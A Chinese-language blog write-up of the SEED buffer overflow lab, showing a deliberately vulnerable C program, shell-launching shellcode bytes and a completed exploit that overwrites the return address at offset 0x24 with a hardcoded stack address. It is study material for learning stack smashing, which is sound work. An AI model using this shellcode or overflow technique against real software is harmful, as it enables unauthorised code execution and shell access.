一次缓冲区溢出攻击实验,难度不高,利用了C的栈指针存储原理。在此简单记录一下。
实验官网地址:http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Buffer_Overflow/
文章目录
-
- 禁用地址随机化
- 程序源码
- 获取str起始地址
- 函数栈结构图
禁用地址随机化
程序源码
/* stack.c *//* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>int bof(char *str)
{char buffer[24];/* The following statement has a buffer overflow problem */ strcpy(buffer, str);return 1;
}int main(int argc, char **argv)
{char str[517];FILE *badfile;badfile = fopen("badfile", "r");fread(str, sizeof(char), 517, badfile);bof(str);printf("Returned Properly\n");return 1;
}
/* call_shellcode.c *//*A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>const char code[] ="\x31\xc0" /* xorl %eax,%eax */"\x50" /* pushl %eax */"\x68""//sh" /* pushl $0x68732f2f */"\x68""/bin" /* pushl $0x6e69622f */"\x89\xe3" /* movl %esp,%ebx */"\x50" /* pushl %eax */"\x53" /* pushl %ebx */"\x89\xe1" /* movl %esp,%ecx */"\x99" /* cdq */"\xb0\x0b" /* movb $0x0b,%al */"\xcd\x80" /* int $0x80 */
;int main(int argc, char **argv)
{char buf[sizeof(code)];strcpy(buf, code);((void(*)( ))buf)( );
}
/* exploit.c *//* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]="\x31\xc0" /* xorl %eax,%eax */"\x50" /* pushl %eax */"\x68""//sh" /* pushl $0x68732f2f */"\x68""/bin" /* pushl $0x6e69622f */"\x89\xe3" /* movl %esp,%ebx */"\x50" /* pushl %eax */"\x53" /* pushl %ebx */"\x89\xe1" /* movl %esp,%ecx */"\x99" /* cdq */"\xb0\x0b" /* movb $0x0b,%al */"\xcd\x80" /* int $0x80 */
;void main(int argc, char **argv)
{char buffer[517];FILE *badfile;/* Initialize buffer with 0x90 (NOP instruction) */memset(&buffer, 0x90, 517);/* You need to fill the buffer with appropriate contents here */ /* Save the contents to the file "badfile" */badfile = fopen("./badfile", "w");fwrite(buffer, 517, 1, badfile);fclose(badfile);
}获取str起始地址
所以shellcode应该放置在0xbffff177+0x64=0xbffff1db
使用gdb反汇编获得bof返回地址为0x24
所以程序代码为:
/* exploit.c *//* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]="\x31\xc0" /* xorl %eax,%eax */"\x50" /* pushl %eax */"\x68""//sh" /* pushl $0x68732f2f */"\x68""/bin" /* pushl $0x6e69622f */"\x89\xe3" /* movl %esp,%ebx */"\x50" /* pushl %eax */"\x53" /* pushl %ebx */"\x89\xe1" /* movl %esp,%ecx */"\x99" /* cdq */"\xb0\x0b" /* movb $0x0b,%al */"\xcd\x80" /* int $0x80 */
;void main(int argc, char **argv)
{char buffer[517];FILE *badfile;/* Initialize buffer with 0x90 (NOP instruction) */memset(&buffer, 0x90, 517);/* You need to fill the buffer with appropriate contents here */ strcpy(buffer+100,shellcode); //将shellcode拷贝至bufferstrcpy(buffer+0x24,"\xdb\xf1\xff\xbf"); //在buffer特定偏移处起始的四个字节覆盖sellcode地址/* Save the contents to the file "badfile" */badfile = fopen("./badfile", "w");fwrite(buffer, 517, 1, badfile);fclose(badfile);
}
函数栈结构图
